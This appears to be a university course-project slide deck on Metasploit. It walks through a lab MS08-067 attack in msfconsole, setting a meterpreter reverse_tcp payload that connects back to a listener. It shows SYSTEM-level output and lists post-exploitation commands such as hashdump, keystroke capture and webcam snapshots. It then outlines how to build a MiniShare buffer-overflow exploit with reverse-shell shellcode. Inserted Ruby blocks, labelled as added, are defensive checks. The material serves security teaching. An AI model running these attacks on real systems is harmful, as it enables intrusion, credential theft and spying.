Metasploit - University of Massachusetts Lowell

burnwholeInternet and Web Applications

Uploaded 5 Feb 2013

91.661 Project
5/4/2011
The University of Massachusetts Lowell

Anthony Gabrielson
Adam Helbling

Agenda

Part 1: The Metasploit Framework
  - Basics
  - Running Metasploit
  - The Exploit
  - Demo
  - More on Exploits

Part 2: From 'ploit to 'ploit
  - Overview
  - Assumptions
  - Environment Setup
  - Ollydbg Introduction
  - Vulnerability Explanation
  - Crafting the Exploit
  - Metasploit Enablers
  - Adding Shellcode


The Metasploit Framework: Basics

Created in 2003 by HD Moore

Vitals
  - BSD License
  - 700K lines of Ruby
  - Currently produced by Rapid7
  - De facto standard vulnerability development framework

Commercial Alternatives
  - Rapid7 has many commercial implementations
  - Immunity's CANVAS
  - Core Impact


The Metasploit Framework: Basics (cont'd)

Metasploit is a well-known anti-forensic and evasion tool
Modular for ease of development and portability

msfupdate
  - Get the latest & greatest exploits

msfconsole
  - The console; also works as a command shell

Exploit Automation
  - db_autopwn
  - Very noisy
  - Requires a database



The Metasploit Framework: Running Metasploit


The Metasploit Framework: The Exploit

ms08_067_netapi (RANK: Great)

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

This attack can be prevented with the MS08-067 patch.


The Metasploit Framework: Demo


The Metasploit Framework: Demo Walkthrough

  msfconsole
  use exploit/windows/smb/ms08_067_netapi
  set PAYLOAD windows/meterpreter/reverse_tcp
  set RHOST 192.168.11.51        (remote host)
  set LHOST 192.168.11.53        (local host)
  show options

  Module options (exploit/windows/smb/ms08_067_netapi):

     Name     Current Setting  Required  Description
     ----     ---------------  --------  -----------
     RHOST    192.168.11.51    yes       The target address
     RPORT    445              yes       Set the SMB service port
     SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

  Payload options (windows/meterpreter/reverse_tcp):

     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     EXITFUNC  thread           yes       Exit technique: seh, thread, none, process
     LHOST     192.168.11.53    yes       The listen address
     LPORT     4444             yes       The listen port

  exploit



The Metasploit Framework: More about the Exploit

  msf exploit(ms08_067_netapi) > show targets

  Exploit targets:

     Id  Name
     --  ----
     0   Automatic Targeting
     1   Windows 2000 Universal
     2   Windows XP SP0/SP1 Universal
     3   Windows XP SP2 English (NX)
     4   Windows XP SP3 English (NX)
     ...
     61  Windows 2003 SP2 Japanese (NO NX)


The Metasploit Framework: Meterpreter Commands

Commands

  meterpreter > sysinfo
  System Language : en_US
  OS              : Windows XP (Build 2600, Service Pack 2).
  Computer        : AGABRIEL-B90B23
  Architecture    : x86
  Meterpreter     : x86/win32

  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM

  meterpreter > shell
  Process 396 created.
  Channel 1 created.
  Microsoft Windows XP [Version 5.1.2600]
  (C) Copyright 1985-2001 Microsoft Corp.

  C:\WINDOWS\system32>

More
  - hashdump
  - upload
  - webcam_snap
  - keyscan_{start, stop, dump}
  - ps



Q: What can you do with a known vulnerability?
  - Craft an exploit, execute from a command-line
  - What else?

Metasploit is not perfect, but it has its place.
  - Repository
  - Framework
  - Tools to help build exploits
  - Ease of use
  - Generic shellcode vs. robust shellcode

Challenges:
  - Crafting the exploit
  - Reuse of an exploit

From 'ploit to 'ploit: Overview

…or how to add a generic exploit to your Metasploit arsenal


From 'ploit to 'ploit: Assumptions

Already spent resources (time, money, etc.) to discover a vulnerability via one (or all) of the following:
  - Fuzzing
  - Static disassembly
  - Review of source code
  - Known vulnerability
      - CVE we found on http://cve.mitre.org/
      - Security Advisory (http://secunia.com/advisories)
  - Known Exploit
      - Exploit DB (http://www.exploit-db.com/exploits)




From 'ploit to 'ploit: Environment Setup

Vulnerability: MiniShare HTTP "GET" Request Buffer Overflow Vulnerability
Exploit: MiniShare Remote Buffer Overflow Exploit (C source)

  - Windows XP SP2 (or really any XP version)
  - MiniShare 1.4.1
  - Ollydbg 1.10
  - Backtrack 4
  - Metasploit
  - Python
  - Netcat


From 'ploit to 'ploit: Ollydbg Introduction

Main Pane:
  - CPU Instructions (Microsoft Assembler format)
Memory Pane:
  - Current section of memory where the code is executing
Registers Pane:
  - EIP: Address of next instruction to be executed
  - ESP: Stack pointer
Stack Pane:
  - Shows the entries on stack



From 'ploit to 'ploit: Vulnerability Explanation

HTTP GET with a large (>1787 bytes) request

  GET [a string of >1787 bytes] HTTP/1.1\r\n\r\n

EIP = 0x41414141
  - Access violation when reading [41414141]
  - EIP points to the address containing the next instruction, but 0x41414141 throws an access violation.

ESP = the address of the buffer that was overflowed.
  - Note the "AAAAAAAAAAAAAAAAAA……AAAA"
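The crash input above is a request target longer than the fixed buffer that receives it. As an added example, not code from the slides or from MiniShare, the Ruby below shows the bounds check a request parser should apply before copying a request target anywhere, together with a simple detection heuristic (a long run of a single byte) that flags traffic shaped like the crash input. MAX_TARGET_LEN, RUN_ALERT_LEN and the two sample requests are constructed assumptions, not values taken from MiniShare.

```ruby
# Added example (not from the slides or from MiniShare): a bounded request-line
# check of the kind a fixed-size GET buffer needs, plus a heuristic that flags
# a request target made of one repeated byte. Thresholds are assumptions.
MAX_TARGET_LEN = 1024   # assumption: upper bound enforced before any copy
RUN_ALERT_LEN  = 256    # assumption: a run of one byte this long is flagged

# Inspects the first line of a raw HTTP request. Returns a Hash with
# :status (:ok, :malformed, :oversized or :suspicious_run), :target_len
# (bytes in the request target) and :longest_run (longest run of one byte).
def check_request_line(raw)
  line = raw.b.split("\r\n", 2).first.to_s
  m = /\A([A-Z]+) (\S+) (HTTP\/\d\.\d)\z/.match(line)
  return { status: :malformed, target_len: 0, longest_run: 0 } unless m

  target = m[2]
  # scan with a back-reference yields [run, byte] pairs; keep the run lengths
  longest = target.scan(/((.)\2*)/).map { |run, _byte| run.length }.max || 0
  status =
    if target.bytesize > MAX_TARGET_LEN then :oversized
    elsif longest >= RUN_ALERT_LEN then :suspicious_run
    else :ok
    end
  { status: status, target_len: target.bytesize, longest_run: longest }
end

# Constructed sample requests: a normal one and one shaped like the crash
# input on the slide (a request target of more than 1787 bytes of 'A').
NORMAL_REQUEST = "GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"
CRASH_REQUEST  = "GET #{'A' * 1800} HTTP/1.1\r\n\r\n"

if __FILE__ == $PROGRAM_NAME
  [NORMAL_REQUEST, CRASH_REQUEST].each { |req| p check_request_line(req) }
end
```

The length check is the fix for the class of bug on the slide: the limit is enforced on the parsed request target before any copy into a fixed buffer happens. The repeated-byte heuristic is only a triage aid for logs or captures; a real attempt would not need to use 'A', so the length bound is the control that matters.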



From 'ploit to 'ploit: Crafting the Exploit

This approach is different than the lab exercise assigned.
  - We are not overwriting the stack's return address here
  - Instead let's find an instruction in the code to transfer our execution:
      \xFF\xE4 = JMP ESP
      - Jump to the address stored in ESP.
      - Overwrite EIP with the address of a JMP ESP instruction.

More robust to some degree because we will pick an address that is predictable and will work across more systems.
  - In Win XP SP2 there is no randomization of the base location where DLLs are loaded, therefore if we choose a DLL it will work on each system that loads this DLL.
  - The best choice would be a DLL provided with MiniShare; however, there are none, so we revert to using a Windows DLL.
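The slide depends on XP SP2 loading every DLL at a fixed base. On later Windows releases a module's base is randomized only if its PE header sets the DYNAMIC_BASE flag, and that flag (together with NX_COMPAT for DEP) is what a defender checks when auditing which modules still offer predictable addresses. As an added example, not code from the slides, the Ruby below reads DllCharacteristics from a PE header and reports both flags. The flag values and header offsets are the documented PE constants; build_fake_pe produces a constructed minimal header for testing, not a real DLL.

```ruby
# Added example (not from the slides): read the DllCharacteristics field of a
# PE header to see whether a module opts in to ASLR (DYNAMIC_BASE) and DEP
# (NX_COMPAT). XP SP2 ignores these flags; later Windows versions honour them.
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040
IMAGE_DLLCHARACTERISTICS_NX_COMPAT    = 0x0100
PE32_MAGIC  = 0x10b
PE32P_MAGIC = 0x20b

# Parses a PE image held in memory. Returns a Hash with :magic, :dynamic_base
# and :nx_compat; raises ArgumentError on anything that is not a PE image.
def pe_mitigation_flags(bytes)
  data = bytes.b
  raise ArgumentError, 'truncated header' if data.bytesize < 0x40
  raise ArgumentError, 'missing MZ header' unless data[0, 2] == 'MZ'
  e_lfanew = data[0x3c, 4].unpack1('V')              # offset of the PE signature
  raise ArgumentError, 'missing PE signature' unless data[e_lfanew, 4] == "PE\0\0"
  opt = e_lfanew + 4 + 20                             # skip signature and COFF header
  raise ArgumentError, 'truncated optional header' if data.bytesize < opt + 72
  magic = data[opt, 2].unpack1('v')
  unless [PE32_MAGIC, PE32P_MAGIC].include?(magic)
    raise ArgumentError, format('unknown optional header magic 0x%x', magic)
  end
  # DllCharacteristics sits at offset 70 of the optional header in both PE32
  # and PE32+ (the wider ImageBase in PE32+ replaces BaseOfData).
  dll_chars = data[opt + 70, 2].unpack1('v')
  {
    magic: magic,
    dynamic_base: (dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) != 0,
    nx_compat: (dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT) != 0
  }
end

# Builds a minimal, constructed PE32 header (not a real DLL) carrying the given
# DllCharacteristics value, just enough for pe_mitigation_flags to parse.
def build_fake_pe(dll_chars)
  e_lfanew = 0x40
  dos = 'MZ'.b + ("\0" * (0x3c - 2)).b + [e_lfanew].pack('V')
  coff = ("\0" * 20).b
  opt = ("\0" * 96).b                                 # PE32 optional header, no data directories
  opt[0, 2] = [PE32_MAGIC].pack('v')
  opt[70, 2] = [dll_chars].pack('v')
  dos + "PE\0\0".b + coff + opt
end

if __FILE__ == $PROGRAM_NAME
  # Pass a path to inspect a real file; otherwise inspect the constructed headers.
  if ARGV[0]
    p pe_mitigation_flags(File.binread(ARGV[0]))
  else
    p pe_mitigation_flags(build_fake_pe(0))           # no mitigations opted in
    p pe_mitigation_flags(build_fake_pe(0x0140))      # ASLR and DEP opted in
  end
end
```

Run against a directory of DLLs, the output lists every module whose base will not move between systems, which is exactly the set the slide's JMP ESP trick relies on; a module without DYNAMIC_BASE is worth rebuilding with the flag set (or retiring) even on a system that otherwise has ASLR.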


From 'ploit to 'ploit: Metasploit Enablers

/pentest/exploits/framework3/tools/pattern_create.rb
  - Creates a unique pattern of a user-specified length.
  - Useful for understanding the offsets within the buffer where we overwrite.

/pentest/exploits/framework3/tools/pattern_offset.rb
  - Returns the location of where EIP is overwritten and where ESP points to.
  - Finds offsets using the pattern generated by pattern_create.rb

EIP overwritten at 1787 bytes into our buffer
ESP points to location 1791 bytes into our buffer
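As an added example, not Metasploit's own pattern_create.rb or pattern_offset.rb, the Ruby below reimplements the cyclic-pattern scheme those tools use (an upper-case letter, a lower-case letter, a digit, repeated) so that the 4 bytes that land in a register during crash triage map back to a unique offset in the data that was sent; the 1787 check in the usage is the offset the slide reports. The function names and the little-endian handling of a hex register value are this example's own choices.

```ruby
# Added example (not Metasploit's own pattern_create.rb / pattern_offset.rb):
# the cyclic-pattern scheme those tools use, for mapping the bytes that land in
# a register after a crash back to an offset in the sent buffer.
UPPER  = ('A'..'Z').to_a
LOWER  = ('a'..'z').to_a
DIGITS = ('0'..'9').to_a
MAX_UNIQUE = UPPER.size * LOWER.size * DIGITS.size * 3   # 20280 bytes

# Returns a pattern of exactly `length` bytes built from upper/lower/digit
# triples ("Aa0Aa1Aa2..."); every 4-byte window is unique within MAX_UNIQUE.
def pattern_create(length)
  raise ArgumentError, "length exceeds #{MAX_UNIQUE} unique bytes" if length > MAX_UNIQUE
  buf = String.new
  UPPER.each do |u|
    LOWER.each do |l|
      DIGITS.each do |d|
        buf << u << l << d
        return buf[0, length] if buf.length >= length
      end
    end
  end
  buf[0, length]
end

# Maps a register value back to its offset in the pattern. Accepts the value
# as an Integer or an 8-hex-digit String (byte-swapped, since x86 stores it
# little-endian) or as the 4 bytes in memory order ("Aa3A"). Returns nil if
# the value does not come from the pattern.
def pattern_offset(pattern, needle)
  bytes =
    case needle
    when Integer then [needle].pack('V')
    when /\A(0x)?\h{8}\z/ then [needle.hex].pack('V')
    else needle.to_s
    end
  pattern.index(bytes)
end

if __FILE__ == $PROGRAM_NAME
  pat = pattern_create(2000)
  puts pat[0, 30]
  # A register reading 0x41336141 after a crash corresponds to "Aa3A" in memory.
  puts pattern_offset(pat, 0x41336141)   # 9
  # The 4 bytes starting 1787 into this pattern are "5Ch6".
  puts pattern_offset(pat, '5Ch6')       # 1787
end
```

The reason the scheme works is that a 4-byte window always contains a whole triple plus one neighbouring character at a known alignment, so the window pins down both which triple it is and where the window starts; that is why the tool can return one offset instead of a list of candidates, and why the pattern stops being usable past 20280 bytes.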


From 'ploit to 'ploit: Adding Shellcode

Using msfpayload, which comes with Metasploit, we will create a useful piece of shellcode which creates a reverse shell on a port.
  - What is a reverse shell?
  - Note: Does this give us away?!
  - C style vs. raw output ('R' vs. 'C')

Does anyone see a problem with some of this shellcode?
  - Msfencode can help us…

Let's add some NOPs to help improve stability.

Now all that would need to be done is to add this to Metasploit as a Ruby script. (Note: It's already in there)



References and Conclusions

  - http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html
  - http://www.offensive-security.com/metasploit-unleashed/Metasploitable

This presentation just begins to scratch the surface.

Questions?


The Metasploit Framework: The Exploit (2)

psexec
  - light-weight telnet-replacement that lets you execute processes on other systems

This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.

This one has more, list 'em



The Exploit (3)

ms05_039_pnp
  - Vulnerability in Plug and Play Could Allow Remote Code Execution and Elevation of Privilege

This module exploits a stack buffer overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. NOTE: Since the PnP service runs inside the service.exe process, a failed exploit attempt will cause the system to automatically reboot.

Affected Systems: Win2k SP4, Win XP SP2, etc…